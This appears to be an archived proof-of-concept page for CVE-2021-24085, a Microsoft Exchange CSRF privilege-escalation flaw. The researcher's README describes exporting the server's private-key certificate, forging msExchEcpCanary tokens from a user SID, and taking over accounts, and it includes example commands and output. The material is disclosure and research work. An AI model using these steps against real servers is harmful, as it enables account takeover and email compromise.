Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-24085 PoC — Microsoft Exchange Server 安全漏洞

Source
https://github.com/sourceincite/CVE-2021-24085
Associated Vulnerability
Title:Microsoft Exchange Server 安全漏洞 (CVE-2021-24085)
Description:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 中存在安全问题漏洞。以下产品和版本受到影响:Microsoft Exchange Server 2019 Cumulative Update 8,Microsoft Exchange Server 2016 Cumulative Update 19,Microsoft Exchange
Readme
# Microsoft Exchange Server msExchEcpCanary Cross Site Request Forgery Elevation of Privilege Vulnerability

This is a Proof of Concept for CVE-2021-24085.

1. `poc.py` downloads the targets cert file with private key inside
2. `YellowCanary` generates the `msExchEcpCanary` csrf token for a specific user based on the SID
3. `poc.js` is the csrf exploit to trigger an account takeover

I have not provided the `malicifest.xml` file but you can find information on how to generate a malcious manifest file from the available resources in the below references section.

## Example

Access the certificate with private key inside:

```
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 harryh@exchangedemo.com:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 harryh@exchangedemo.com:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
```

Now you can generate csrf tokens with `YellowCanary` using a target users SID:

```
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.
```
  
## References:

- https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
- https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
File Snapshot

 [4.0K]  /data/pocs/0b39ef8c891a45bcfe726d83df673c36bb276cb5
├── [1.5K]  LICENSE
├── [1.6K]  poc.js
├── [4.9K]  poc.py
├── [1.7K]  README.md
└── [4.0K]  YellowCanary
    ├── [4.0K]  Poc
    │   ├── [ 189]  App.config
    │   ├── [2.3K]  Poc.csproj
    │   ├── [9.5K]  Program.cs
    │   └── [4.0K]  Properties
    │       └── [1.4K]  AssemblyInfo.cs
    └── [1.1K]  YellowCanary.sln

3 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.